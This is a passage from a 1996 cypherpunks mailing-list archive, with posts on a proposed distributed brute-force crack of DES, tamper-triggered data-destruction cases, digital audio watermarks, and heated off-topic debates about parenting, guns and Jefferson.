strong crypto are well known and almost always expressed over my .sig file
(which gives my address and telephone number).  In fact, I just asked to
have my name added to a letter addressed to FBI Director Louis Freeh on the
subject*.  If they don't know where I stand, then they don't care (as seems
likely).

The United States of America has a very strong statement in the first
amendment allowing people freedom of speech and "to petition the Government
for a redress of grievances."  While exercise of these rights has sometimes
resulted in certain sanctions (the Hollywood witch hunts and loss of
security clearances come to mind), if people don't stand up for what they
believe, then they diminish the very foundations of the country.  Sometimes
freedom is only available to the brave.  (But I don't really think this is
one of those times.)


* See safe@cdt.org or http://www.crypto.com/safe for information on this letter.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 23 Jul 1996 15:56:49 +0800
To: trei@process.com
Subject: Re: Brute Force DES
Message-ID: <199607222043.NAA06313@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Peter wrote:
> >Any one up for a distributed brute force attack on single DES? My 
> >back-of-the-envelope calculations and guesstimates put this on the
> >hairy edge of doability (the critical factor is how many machines can
> >be recruited - a non-trivial cash prize would help). 

Duncan wrote: 
> I volunteer my 120 MHZ Pentium.  A lot more Pentiums are out there now than
> a year ago.  That makes it more feasible.  A lot more people with full net
> connections.  Like most Americans, I have a flat rate net connection and a
> flat rate local phone connection so could run a cracking session permanently
> (as long as no one tells my ISP).  We need a full test of the Winsock
> cracking client in any case.  It wasn't working very well last time.
> 
> DCF

<back-of-envelope>

In my terminology, 'hairy edge of doability" means we have a shot
at success, but I wouldn't bet the farm on it.

I thought that I might bet a couple hundred bucks, though.

Sadly, after further calculation, I'm not so sure if it's doable just yet.

What I'm looking at is a known plaintext attack on single ECB DES, 
using a brute-force test to cycle through the key space. People 
would get chunks of keyspace to test from a central server or 
servers, and would be motivated to take part by a cash prize for
the lucky person who finds the key.

Lets do  the numbers:

Single DES has the security of 56 bits of key - there are 64 bits in the
keys, but 8 of them are parity bits which add nothing to security.

2^56  = 7.205e16 keys (which is a whopping big number)

Let's guess that we can recruit the equivalent of full-time on 1000
machines.

7.205e13 keys/machine.

Let's guess that we have about a month before people start to lose 
interest - so we want to be more than 1/2 done by then. Lets say
we want to sweep the whole space in 40 days.

1.8e12 keys/machine/day 

~21,000,000 keys/machine/second

The fastest general purpose, freely available des implementation I'm
aware of is libdes. by Eric Young. With this, I can do a set_key in 
15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).

I'm looking at ideas to speed up DES - if I'm willing to use
honking great lookup tables, the permutation steps  can be done 
more quickly than libdes. I'm also looking at implementing the
algolrithm in hand-optimized P5 assembler.  (It's been years since
I've done a major assembler project - the P5 has some truely weird
features to be considered, but also has (some) internal 64 bit
registers to play with).

Let's guess that I can speed up a key-test up by a factor of 10. (This is
not a slur on Eric's code - it's extremely clever, but not optimized
for any particular processor, or for key-testing.  Note that the keytest 
described above takes about 10,000 cycles/test.)

That gets my workstation up to about 90,000 keys a second, which is
still almost a factor of 250 too slow. 

I'm going ahead with my work on a faster DES keytester, but unless
optimizing gives an astounding win, I now think a distributed bruting 
effort is a bit pre-mature.

What will make this brute doable, if not now, then in the near future?

1. Faster Processors - Moore's Law is still holding. A year ago, my
90 MHz Pentium was one of the faster machines taking part in the
40-bit RC4 crack. Now, it's passe.

2. More processors. The number of people on the internet continues
to grow rapidly.

3. More interest - Crypto awareness has greatly increased in the
last year, and a real cash prize (say, over $500) will generate both
publicity and interest.

These factors all multiply together. The number of cycles that could
probably be recruited is increasing at a fast rate. A major part of the
work will be a keyspace distribution mechanism which can handle
the load (this was a major stumbling block last year). 

</back-of-envelope>

Peter Trei
trei@process.com

Disclaimer: This has nothing to do with my employer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 23 Jul 1996 17:17:52 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Filtering out Queers is OK
In-Reply-To: <199607200000.RAA10799@netcom11.netcom.com>
Message-ID: <199607230003.RAA00839@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



>  > clear that the government may force a child to accept
>  > secular ideas that may violate the child's religious
>  > background, even if the government has a compelling secular
>  > interest in doing so.
> 
> This is the usual smokescreen the "parents rights" lobby brings
> to the bargaining table.  Rather than make the debate over the
> rights of the child, and what resources the state should make
> available to the child to protect those rights, they make it a
> contest between the parent and the state to see who gets to
> violate the child's rights the most.

I am not anybody's lobby, so you can just cut the accusation crap.

Secondly, I expect to have full control over the education and the
upbringing of my child.  I DO NOT have to let him go the library.
I DO NOT have to let him read any literature.  I DO NOT have to
let him have an open mind.  It is NOT in the Constitution.

I will do so because I believe it is good for him.  Anyone who
wants to change what I decide is good for him will have to do so
over my dead body.

> So instead of arguing whether children should have access to
> education, libraries, computers, and other resources in their own
> right, we get the usual endless debate over whether the state or
>
> Been there.  Done that.  And as the Scottish would say, "It's
> Crap."

I really could care less what you feel about how I should raise my
child.

> Again, children have a right to go to libraries, get educated,
> and use telecommunications resources without interference by
> EITHER the state or their parents.

This truly IS pure crap.  Parents have a responsibility.  Your
arbitrary choice of "parental rights" is just rhetorical method for
implying that parents are selfishly fighting for their own good at
the detriment to the child.

In fact, most parents are loving, caring, and try very hard to do
what is "good" (in their mind) for their child.  You, sir, do not
have some God-given monopoly on knowing what is good for any child,
let alone, mine.

Therefore, nobody (not you, not the PTA, not the school, not the
Congress) has any right to tell me what is good for my child.

Call it what you want; you ain't brainwashing my child with your
bull.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Tue, 23 Jul 1996 16:50:11 +0800
To: "'cypherpunks@toad.com>
Subject: RE: [Noise] was Re: Giving 6 year old kids Uzi's
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960723000701Z-34713@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 July 1996, Brad Dolan wrote:
>
>On Mon, 22 Jul 1996, Ernest Hua wrote:
>
>> 
>> > > > Thanks, but if it is all the same to you, I'd rather live
>> > > > in a country where everybody  << including six year olds >>
>> > > > carry, and can use Uzi's, etc, as a matter of course.
>> > > 
>> > > Would you just hand out guns to all teenagers?
>> > 
>> > My twelve-year-old daughter asked for and received a .22 for her
>>birthday.
>> > Her four and six year old siblings enjoy shooting it, under close 
>> > supervision.
>> 
>> The question was not whether you might let your little girl operate
>> a gun.  The question was whether you might let her carry it as part
>> of her standard equipment.  Would you let her go to school with it
>> loaded or with ammo within easy reach?  I mean, what's the point of
>> carrying a gun without bullets?
>
>My daughter often carries her gun to school, complete with large 
>quantities of high-velocity long-rifle cartridges.
>
>She's homeschooled and marksmanship is one of her extracurricular activities.
>
>bd
>
>p.s.  In two years of homeschooling, she has advanced 6 grade levels on 
>the state-mandated achievement tests.  
>

I don't care if it takes my son 6 years to get through 2 grade levels,
anyone who allows there kid to pack a gun (or a rifle?) should get their
head examined (or join the Freemen--I hear they are short a few
members).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Tue, 23 Jul 1996 18:11:50 +0800
To: jimbell@pacifier.com>
Subject: Re: Opiated file systems
Message-ID: <2.2.32.19960722220926.00623064@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 03:29 PM 7/21/96 -0700, Bill Frantz wrote:
>At  9:26 PM 7/19/96 -0800, Chris Adams wrote:
>>BTW, I'd try a fiber-optic connector to the machine because 1) it's
>>waterproof and you wouldn't have to be quite as paranoid about leaks, 2)
>>it's far more secure, 3) it's faster and 4) it's probably impossible to
>>trace like a metal wire (i.e. run current through and trace magnetic
>>fields...)...
>
>Just some random advice: My high-speed networking expert friend says that
>plastic fiber is good to about 4-5 miles, and is a lot easier to work with
>than glass fiber.

What about a machine setup that has its own intrusion detection?  An
internal battery-backup system that also powers case-tampering detection
hardware could be set to trigger "Alternate Stego File System Plan A".
Replace drivers, etc., with software that does not contain the real system's
drivers at all, which you have wisely placed only in a very offsite backup
location.  

Tamper-detecting cases of this sort already exist:  look at a U.L. listed
Burglar Alarm external cabinet.  Double-walled, and the internal wall is
electrically insulated from the external wall such that any short between
the two walls, (i.e. a bad guy with a drill bit), will fire the trigger.
Certain shielding schemes used by some manufacturers today might already
provide a good design.

You could also go overboard and fill the interior with various environmental
detectors.  Photosensitive transisitors.  Tilt/tremble sensors.  Temperature
sensors.  Smoke detectors.  Accelerometers (see Scientific American a few
months ago for a circuit).  Microswitches that are held open by virtue of
having the case screws in place.  Build a double-walled case (as mentioned
above) and keep it pressurized with nitrogen, and have a pressure sensor to
detect leakage.  Lead-line the interior, and place an X-ray detector where
any attempt to X-ray the machine will result in Plan A.  And if they want to
try using MRI to see inside; well, I guess I probably wouldn't be too
surprised!  :-)

If you had absolute faith in your machine's inability to crash (i.e. not
running a Wintel operating system), the drivers could be written to copy
themselves into memory at bootup and securely wipe themselves from your hard
disk; and write themselves back to hard disk at a shutdown request.  Your
machine is then vulnerable only when properly shut down, a state in which I
would not recommend leaving it.  Leave it only in a "password required"
state, and *this* would be the place to implement the duress password.

As for seed data to encrypt to give them something to find, may I suggest
that would be an excellent choice to keep both your Netscrape cache as well
as your Winders swap files?  Lots and lots of sectors worth of data, kept as
fresh as often as you use your browser.  And as long as you don't browse
"illegal" sites (whatever that might mean in your country), you win.

And, of course, protect all external connectors so your opposition wouldn't
be able to shove a wire in your RS-232 port and short your internal battery.
The low/no battery level alarm would be used to ignite the magnesium wrapped
around the hard disk's case (also known as Alternate Stego File System Plan
B :) , or it would trigger the capacitively powered EMP coil mounted above
the platters; neither of which you would want triggered unless the
software-stego routines hadn't completed by the time the case was breached.

My point is it should be possible to build a virtually tamperproof case; and
especially if your attacker doesn't know it exists, you would stand a good
chance of being able to eliminate self-incriminating data (sometimes the 5th
amendment needs some mechanical assistance) before the bad guys would have
the ability to save an "untampered" copy.

John.
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 23 Jul 1996 16:38:44 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <v0300760dae16b3606e8b@[192.187.162.15]>
Message-ID: <199607230014.RAA00859@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> >Rural America has a very different culture than urban America and urban
> >America's recent attempts to impose its values (like hoplophobia) on us
> >really chafes.
> 
> Though it is well known that I am in favor of gun control regulations, I
> have to support Brad Dolan here. There is a huge and traditional gun
> culture in rural American, particularly in the midwest. The way most Jewish

Or the way many blacks were lynched (physically and socially) in the South.
Or the way many asians were segregated.  Or the way many ethnic groups
fought each other in inner cities.

These are cultural relics of the good ol' days I simply can do without.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 03:54:14 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Boycotts and Etiquette
Message-ID: <ae18f6fa06021004546b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:04 PM 7/22/96, Alan Horowitz wrote:
>My own decision to not interlocute with Sternlight is premised as
>follows:  His viewpoint is invariant and, by now, efficiently disseminated.
>Briefly, he is a Statist and he never heard of any degree of Statism that
>offends his sensibilities.  I understand he's old enough to have been
>around when Stalin was still running things in the USSR.  David probably
>was finding good things to say about Old Joe.  And more importantly,
>about J Edgar Hoover.

Actually, David came out _against_ both Digital Telephony and mandatory key
escrow, as I recall. For me, his process of conversion took entirely too
long, as most of saw in the ostensibly voluntary Clipper program the seeds
of a mandatory regimen. But he _did_ come out against these programs.

I think this refutes the point that he's never heard of any degree of
Statism that offends his sensibilities.

>I pay by the minute for my internet access; many others do as well. If I
>decide to ignore Sternlight, it is a business decision, not a moral one.

Understandable. I find that _writing_ an article, even a short one like
this, takes about as much time as adding 10 people to my filter file or
hitting the "delete" key 50 times, so filtering out stuff I don't want to
read has never been an issue.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Syfrig <nsyfrig@condor.depaul.edu>
Date: Tue, 23 Jul 1996 17:01:16 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billboard (fwd)
Message-ID: <Pine.SOL.3.91.960722164534.22991B-100000@condor.depaul.edu>
MIME-Version: 1.0
Content-Type: text/plain



I got the following from the e$pam service.

---------- Forwarded message ----------
Date: Mon, 22 Jul 1996 14:56:43 -0400 (EDT)
From: e$pam <e$pam@intertrader.com>
To: Multiple Recipients of e$pam <e$pam@intertrader.com>
Subject: Re: Digital Watermarks for copy protection in recent Billboard

Forwarded by Robert Hettinga

-----------------------------------------------------------------------
Comments: Authenticated sender is <alexf@[204.241.60.5]>
 From: "Alex F" <alexf@iss.net>
 Organization: Internet Security Systems, Inc.
 To: cypherpunks@toad.com, "Deranged Mutant" <WlkngOwl@unix.asb.com>
 Date: Mon, 22 Jul 1996 11:19:17 +0000
 MIME-Version: 1.0
 Subject: Re: Digital Watermarks for copy protection in recent Billboard
 Reply-to: alexf@iss.net
 Priority: normal
 Sender: owner-cypherpunks@toad.com
 Precedence: bulk


> Paged through a recent (June or July 13) edition of Billboard
 > magazine yesterday.  There was an article about the music industry,
 > the internet, and copyright issues.  Didn't have a chance to read in
 > thoroughly, but it mentioned using digital watermarks which contained
 > info on to who (CC number) and when the material was sold... the
 > watermarks allgedly could survive if a CD was taped, copied several times
 > and redigitized.
 >
 
 Easy enough.

- Unless somebody reversed-engineered it, filtered it, and re-stamped it.
 
 > The anti-piracy scheme is only useful for direct sale to a customer
 > though.  If you buy music anonymously, how is it traced?  This only
 > works for pirating on-demand purchases.
 
 This is probably yet another case of people not thinking ahead.  As
 usual.  People buying CDs at a garage sale & getting arrested for
 piracy.  Wonderful.

- The entertainment industry has a reputation of being paranoid, ever 
  since individual cassette duplication became popular, albeit with
  reduced signal quality (a lot of people don't care as much about the 
  signal quality and the industry knows that).  Some of you may recall 
  the flap over DAT, which significantly reduced the consumer market 
  penetration (the industry itself uses them all over the place).

  The industry is also not known for forward-thinkers, even though 
  they can and do hire them on occasion.

  While they aren't going to be worried about $8.00 at a garage sale, if 
  they see mass single-copy distributions going on at enough garage 
  sales, but they only sold 30 "master" copies, they might get concerned.
  Hey, judging by the announcements of how much piracy costs the 
  industry, they probably don't rule this out (again, being all digital, 
  under the current copyright scheme, there might even be a point).  Yup, 
  time to rethink the whole concept of copyright, intellectual property, 
  et al, although I have no idea how to approach the issue.
 
 >
 > Other issues: what if an eavesdropper steals the music or video? It's
 
 If they steal it, well, who cares?  If there is something worked out
 so that they could trace STOLEN (not traded or sold) CDs then fine,
 arrest them.  Do you really think though that anyone would waste so
 much time over $8?

- if it's too easy, then tools to do it will become so widespread that 
  even the average user will engage in such practices.  This time, 
  being digital, the reduced-quality incentive doesn't hold (you still 
  have the even-less-effective argument of the associated cover art not 
  being included or being scanned and duplicated with reduced signal 
  quality, unless the distribution is all on-line).

  Bottom line:  There really is no way around this in the long run, but 
  there's a l-o-t of money at stake.  Therefore, delaying tactics are 
  worth something to the big players in the industry, which is what we 
  are seeing (some people might not 'get it' but there's enough money 
  to where people who 'get it' can be and are hired to gum up progress).
 
 > If it uses a credit-card number as (part of) an ID, that's pretty
 > bad.  Someone can sniff for CC numbers if they know how it's stored.
 
 Probably not done that way.  My guess is that the disk ID is assigned
 to the disk at the time of manufacturing.  At the point of purchase
 the customer is forced to give name, address, ID, whatever.  This is
 then stored in a database along with the disc ID (serial num) which
 is prolly printed in the ISBN number or cross referenced with that in
 a national database or something, or just printed right on the disc.
 Anyway, a number is given to you from the CD, and not vice versa, I
 would imagine.

- Would YOU want to be responsible for maintaining that database?  It's 
  like maintaining a hardware store trying to maintain an ID on every 
  single screw and nail in inventory.
 
 >
 > The system will have to rely on proprietary tech and security through
 > obscurity.  Even know how watermarks are stored without understanding
 > the math, one must be able to somehow garble the sound without
 > distorting it, but which renders the watermark useless.
 
 Actually, this would be quite easy.  The "watermark" would be a
 signal that plays inband, but out of our hearing range during the
 entire CD.  The human ear can only hear in the 20-20,000 (Hz, KHZ?,
 whatever) range.  It would be trivial to add a digital ID signal at,
 say 30,000 or 15 or something like that.  This could then be decoded,
 if need be.  This seems the easiest and most efficient way.  This
 could also be defeated with a lot of $$ (and/or a LOT of HD space).
 If the frequecy is known (it can be found out) it can easily be run
 through recording studio eqipment that can very effectively isolate
 the frequency and cut it out.  If you have a LOT of HDD space
 (digital audio at 2 stereo tracks, not sure of the sampling rate or
 bit resolution, takes about 20MB of HDD space per minute (2 tracks,
 good sampling and bit rate) ) you could probably find the freq.
 fairly easily by isolation and just edit it out, and write the new
 stuff to a CD-R.  If the signal is purely digital, I would imagine
 that it might be even easier that if it were an analog signal (?).
 Someone w/ good equipment (Digital Labs' stuff, or SAW (Software
 Audio Workshop) would be able to do this w/o much problem.  The
 question is is the price/effort worth it?  In quantity maybe.  On an
 individual basis, only if you already happen to have the erquipment.

- Nobody's going to try and do a higher-frequency encoding (I HOPE).  While 
  the human ear cannot hear those frequencies directly, we have found out 
  that those higher-frequencies interact in such a way to influence the 
  sound waves that influence what the user can hear.  This is the reason 
  there's still a debate between digital and analog recordings, and is 
  still a big reason a lot of artists still record on analog equipment 
  (in musical "fuzzy" terms, it's equated with the warmth of the sound, 
  sort of like the tube-amp vs. solid-state amp debate among some guitar 
  players, etc.)  If somebody deliberately played with such frequencies, 
  the journalistic media would probably have a field day.  Yes, there are 
  audio cancelling and other tricks that could be deployed, but no matter 
  what, you're still deliberately introducing signal noise (I wonder this 
  influenced the non-acceptance of "minidisks" from a few years back - 
  aside from it's incompatibility with anything else around)

  If I remember correctly, there is plenty of room in the design of the 
  audio CD protocal to embed such information, just like you can embed 
  the timing and track number information.  Some might remember the 
  sort-of craze of embedding stupid "graphics" and words to audio CD's 
  which special players could read and display on a monitor but didn't 
  affect normal audio CD players (Lou Reed's "New York" was one of the 
  few releases that I saw which advertised this "feature").  It turned 
  out to be too hokey even for the consumers of the time.  In other 
  words, there are plenty of ways of achieving this.  However, my guess 
  would be to use up 650Meg of a hard drive, copy the CD byte-by-byte, 
  and reverse-engineer away.  Then you could easily stamp a "clean" master.
  (DVI could change the game - I don't know what the status of this 
  battle is, other than it's shades of the DAT battle all over again)
 
 I have a suspiscion that this type of thing will not really come to
 any kind of fruition due to not only the ability to defeat this, but
 mainly due to things like buying at a garage sale, etc.  If it did,
 only MASS market piraters would be investigated.  (Another example of
 a law creating it's own violators.  Don't make the law, there won't
 be mass piratingof "clean CDs"

- Well, the MASS market piraters are exactly the point.  Well, let's face 
  it, if the industry controllers got their way, there would be no 
  second-hand market like garage sales - there IS money involved here 
  (witness the bizarre dealings with CD-rental stores that have shown up 
  over the years).  However, they are counting on the majority of their 
  customers not having the equipment to easily defeat this, which up 
  until now, has been the case.  However, recordable CD's have come down 
  dramatically, along with hard-disk prices, and all the tools required 
  are much more available than most people outside this list would have 
  predicted.  And from an industry perspective, as this list already 
  knows, it ain't gonna get any better.

- Bottom line:  I expect things are going to get pretty bone-headed.  
  Wow, such insight!
 
 Alex F
 =-=-=-=-=-=-=-=-=-=-=-=-=-
 Alex F    alexf@iss.net
 Marketing Specialist
 Internet Security Systems
 =-=-=-=-=-=-=-=-=-=-=-=-=-

Nathan F. Syfrig
(views are my own standard disclaimer)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 04:11:27 +0800
To: cypherpunks@toad.com
Subject: Re: Special Agent Safdar
Message-ID: <ae18fbe1080210047b49@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:32 AM 7/22/96, Bilderberger Standard Time, Disinformation Officer
Anonymous wrote:
>FBI Special Agent Safdar is upset enough by the revelation
>of his true identity to issue a quick denial (on a sunday night, to get
>more OT no doubt), but he doesn't even bother to try to refute the
>central truth that his cover has been blown by a careless operator at
>his home office who verified his employment and offered to take a message
>for him.
>
>We don't have to wonder a second longer about the motives behind
>Safdar\VTW\FBI's collection of names of crypto-dissidents, their
>support of the Leahy crypto control bill, their refusal to
>denounce it even today, their support of the digital telephone
>act, the disinformation to make us believe otherwise and all
>the other lies. And what about the money?
>
>We must call on the other organizations, like EPIC, EFF, CDT, and ACLU
>to denounce the VTW\FBI fraud. Their board of directories, Blaze and

I contacted Field Agent Eric Hughes, of the Western Regional Office, and he
denied that there are any connections between VTW (Vulis Tchurka Watch) and
the FBI.

The special functions of Operation Sun Tentacle, led by a former Sun
employee named John Gilmore, are focussed almost totally on recruiting the
"tentacles" of dissidents in the Western Regional Area, centered on the Bay
Area.

Ignore disinformation.

--Special Agent Timothy C. May


cc: James Kallstrom, Cypherpunks New York Office









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 23 Jul 1996 16:29:20 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Distributed DES crack
In-Reply-To: <199607221830.OAA12526@jekyll.piermont.com>
Message-ID: <Pine.A32.3.93.960722174148.48340B-100000@navajo.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



I've a few machines around that could be dedicated almost full time to the
task. What are the bandwidth requirements? Specifically, could the
keycracker be run over a 28.8 (with a 486 running linux)?  If so, how many
486's could I get over a single 28.8 (i.e. 28.8 -> multiple 486's daisy
chained with ppp over direct serial connection)?

--nc

On Mon, 22 Jul 1996, Perry E. Metzger wrote:

> 
> Perhaps a Java page containing a DES cracker that one could run for
> the casual participant, and a set of links to download a real cracker
> for the non-casual participant...
> 
> I think its really time that we did this. DES must be shown to be
> dead.
> 
> When the media hear about it, they will, of course, get "experts"
> saying "but it took five thousand people millions of dollars in
> computer time". We should ask Matt Blaze to write a paper in advance
> explaining that although this test, on general hardware, took a lot of
> effort, that with specialized hardware it would be cheap as can be.
> 
> Perry
> 
> Paul Foley writes:
> > "Peter Trei" <trei@process.com> wrote:
> > 
> >    Any one up for a distributed brute force attack on single DES? My 
> >    back-of-the-envelope calculations and guesstimates put this on the
> >    hairy edge of doability (the critical factor is how many machines can
> >    be recruited - a non-trivial cash prize would help). 
> > 
> > Not quite sure what you mean by "doability" -- it's obviously doable,
> > it just depends how long you want to wait.
> > 
> > I'm in.
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 23 Jul 1996 18:53:35 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <199607230003.RAA00839@server1.chromatic.com>
Message-ID: <199607230053.RAA09949@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua <hua@chromatic.com> writes:

 > Secondly, I expect to have full control over the education
 > and the upbringing of my child.  I DO NOT have to let him go
 > the library. I DO NOT have to let him read any literature. I
 > DO NOT have to let him have an open mind.  It is NOT in the
 > Constitution.

Since the courts have said that humans under 18 are not "persons"
under the law, you have every right to not let your child read
anything, to not let him think for himself, and to not let him
out of the house until he reaches his 18th birthday.

Your child would presently have no recourse against you should
you choose to treat him in such a fashion, and believe it or not,
there are some of us who would like to change that.

 > I will do so because I believe it is good for him.

Good for you, at least.

 > Anyone who wants to change what I decide is good for him
 > will have to do so over my dead body.

Works for me.  I needn't point out that if I were ever on a jury
charged with determining whether your child, treated in the
aforementioned fashion, was guilty of a crime for splattering
your brains all over the living room wall like tapioca pudding, I
would find it almost impossible to vote for conviction.

 > I really could care less what you feel about how I should
 > raise my child.

You know, when children whine "I don't care what anyone else
thinks - No one has a right to tell me what to do", alarm bells
go off all over the place.  When parents say the exact same
thing, they think they deserve some sort of medal.

 > In fact, most parents are loving, caring, and try very hard
 > to do what is "good" (in their mind) for their child.  You,
 > sir, do not have some God-given monopoly on knowing what is
 > good for any child, let alone, mine.

The obvious fact is, neither do you.  Anyone with an IQ over 10
and genitals that are in working order can produce offspring. You
seem to think that the act of reproduction instantly transforms
the scum of the earth into child-rearing experts who must never
be contradicted by any outside agency as they lord their wishes
over their chattel.

 > Therefore, nobody (not you, not the PTA, not the school,
 > not the Congress) has any right to tell me what is good for
 > my child.

I think you have your child confused with your car.

The sad fact is that you are probably at the top of any list one
would prepare of groups and persons who think they know what is
good for children and don't.

 > Call it what you want; you ain't brainwashing my child with
 > your bull.

I think you've already done an excellent job of that yourself.

ObCrypto: Kids who have parents like this should know how to use
          strong encryption on their PCs.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Tue, 23 Jul 1996 13:11:51 +0800
To: cypherpunks@toad.com
Subject: Win 95 security
Message-ID: <TCPSMTP.16.7.22.-15.58.20.2780269260.1201425@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


Just found this in my Inbox. Maybe somebody wants to check it out...


Harka


== Forwarded Message Follows =========================================

>From :  75037.725@CompuServe.com (Yonat Dascalu):

I have uploaded to Simtel.Net:

http://www.simtel.net/pub/simtelnet/win95/util/wsi95-20.zip
ftp://ftp.simtel.net/pub/simtelnet/win95/util/wsi95-20.zip  1243345 bytes

wsi95-20.zip    The security solution for Windows 95

Win-Secure-It, v2.00, The Security Solution for Windows 95.  Supply
Single/Multi user protection against unwanted intruders from accessing
items you choose to protect.  Protection is done in four levels,
completly hiding files and folders, blocking any access to the files,
allowing just files read-only access, or just monitor file and data
usage.  Intruder's log is collected to keep track on unwanted attempts to
violate the file security.  Can be activated also in Stealth mode.  A
tool for anyone who tries to protect his files and work data.

Special requirements: None.

wsi95-20.zip has replaced wsi95-12.zip

Shareware.  Uploaded by the author.

Yonat Dascalu
75037.725@Compuserve.com
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 23 Jul 1996 15:36:44 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607221842.AA00771@Etna.ai.mit.edu>
Message-ID: <Pine.LNX.3.94.960722175337.127B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 22 Jul 1996 hallam@Etna.ai.mit.edu wrote:

> Nope, ad-hominen is a perfectly acceptable form of attack when calling
> into question a speaker's credentials. The words are used because they
> were Jefferson's and because he is held up as a supporter of liberty.
> Pointing out that the words are the cant of a hypocrite is entirely
> justified.

You fail to mention that Jefferson tried to pass a law through Congress that
would make slavery illegal by 1800.  The bill failed to pass by one vote.
Also, he deplored slavery and considered it evil.

> 
> Notwithstanding entailment clauses, Jefferson was under no compunction to
> exploit his slaves by exploiting their labour. He could have paid them 
> competative wages and allowed them to chose to work for others. In short
> he could in effect have freed them. Of course then he would not have had 
> the financial means to live as a member of the privileged classes. 
> 
> Genuine philosophers have made such sacrifices. Russell gave away his 
> inheritance after completing Principia because he objected to the idea
> of inherited wealth. 

This is an entirely subjective and philosophical argument about whether the
means justify the ends.  I won't debate any of the issues here.  However,
consider the fact that if Jefferson didn't have as much money as he had, he
might have not had as much policial impact.

Also think about the fact that all libertarians who drive cars, are by your
definition, hypocrites because they drive on tax-funded roads.

Sometimes it is necessary to violate one's principles in order to help the
greater good.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfP6j7Zc+sv5siulAQF1TAP/XX2fPK7HpBnI7tykVoCFCl+CFZF/7Jj+
pttjhuraBCZ1qmW2QUzbbFNAATWB6toMhIAui75b3hZo1Bc+L6zerUYqkLeiACB1
0QVfVyztBnptNmLfUw9W6+EXEE0iLv9AoAHKPzbv4sQhjbr4ndraplVuDgItu25B
wDfsxVbplYk=
=bhCN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 23 Jul 1996 13:51:23 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607221822.OAA12499@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960722174811.25749D-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


